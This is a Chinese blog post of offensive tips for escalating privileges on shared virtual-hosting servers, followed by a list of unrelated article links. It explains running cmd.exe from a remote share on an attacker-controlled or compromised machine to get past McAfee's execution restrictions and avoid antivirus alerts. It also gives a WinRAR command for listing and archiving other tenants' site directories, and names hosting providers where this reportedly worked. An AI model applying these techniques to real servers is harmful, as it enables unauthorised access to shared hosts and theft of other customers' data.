当前位置: 首页 > news >正文

虚拟主机提权技巧:调用远程路径去执行CMD

摘要:是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 拒绝访问? 原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都...

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?

原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。

下面是个人的小技巧:

1: 是否大家会想到调用远程路径去执行CMD,比如(\\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:

1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活GUEST用户,在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典,所在共享目录程序给Everyone权限,如图:

2:还要注意一点就是你要提权的机器能去访问你自己VPS的445端口,想知道能不能访问可以在SHELL上扫一下(如果不能,他肯定能去访问C段中机器的共享,明白啥意思了?)

2:这里提到的第二个小技巧就是利用WINRAR,应该有些人已经会用他去列目录了,(这个方法就是你实在提不了,补丁很全,要么就是杀软很牛,而免杀不是你的强项,如果你想跨目录弄到目标站),首先在目标站找个图片地址,

然后shell里面C:\progra~1\WinRAR\Rar.exe a -k -r -s -m1 c:\windows\temp\xx.rar E:\freehost\xxxasdfdsafsaf.jpg,这样shell中会回显你打包成功,目标网站根路径会显示出来,然后你打包网站根路径,会将网站所有目录列出来,你们可能会问,都是虚拟权限你怎么过去,可是我测试了星外,新网的虚拟主机,都成功列出目录并打包。。

虚拟主机提权技巧:调用远程路径去执行CMD

就是提权的一点小技巧,大牛勿喷。

相关文章:

  • vlan hopping attack
  • 屏蔽几个知名的安全工具对网站进行扫描
  • PHP面向对象程序设计的61条黄金法则
  • PHP程序员面试题
  • 构架高性能WEB网站的几点知识
  • apache常用配置
  • 作为程序员为什么一直都很努力,却没有进步?
  • node.js进阶学习
  • 3种Nginx防盗链的方法
  • Nginx反向代理到apache
  • Nginx负载均衡如何进行配置
  • 网站上线之前需要检查的13个问题
  • php实现文件上传进度条
  • PHP程序员突破成长瓶颈
  • LINUX常用命令(基础)
  • -------------------- 第二讲-------- 第一节------在此给出链表的基本操作
  • 【Under-the-hood-ReactJS-Part0】React源码解读
  • ECS应用管理最佳实践
  • LeetCode29.两数相除 JavaScript
  • magento 货币换算
  • React-flux杂记
  • SegmentFault 2015 Top Rank
  • Vue组件定义
  • Yeoman_Bower_Grunt
  • 包装类对象
  • 编写符合Python风格的对象
  • 从@property说起(二)当我们写下@property (nonatomic, weak) id obj时,我们究竟写了什么...
  • 机器学习 vs. 深度学习
  • 前端代码风格自动化系列(二)之Commitlint
  • 使用 @font-face
  • 使用parted解决大于2T的磁盘分区
  • 使用Swoole加速Laravel(正式环境中)
  • kubernetes资源对象--ingress
  • 阿里云移动端播放器高级功能介绍
  • ​Spring Boot 分片上传文件
  • # Swust 12th acm 邀请赛# [ K ] 三角形判定 [题解]
  • # 计算机视觉入门
  • # 睡眠3秒_床上这样睡觉的人,睡眠质量多半不好
  • (四)鸿鹄云架构一服务注册中心
  • (一)Java算法:二分查找
  • (转)关于如何学好游戏3D引擎编程的一些经验
  • .gitignore文件—git忽略文件
  • .NET Core使用NPOI导出复杂,美观的Excel详解
  • .NET Remoting学习笔记(三)信道
  • .NET 中的轻量级线程安全
  • .net6Api后台+uniapp导出Excel
  • .net操作Excel出错解决
  • .NET导入Excel数据
  • .NET框架设计—常被忽视的C#设计技巧
  • .net项目IIS、VS 附加进程调试
  • /*在DataTable中更新、删除数据*/
  • /dev/sda2 is mounted; will not make a filesystem here!
  • @Autowired 与@Resource的区别
  • @拔赤:Web前端开发十日谈
  • [ 常用工具篇 ] AntSword 蚁剑安装及使用详解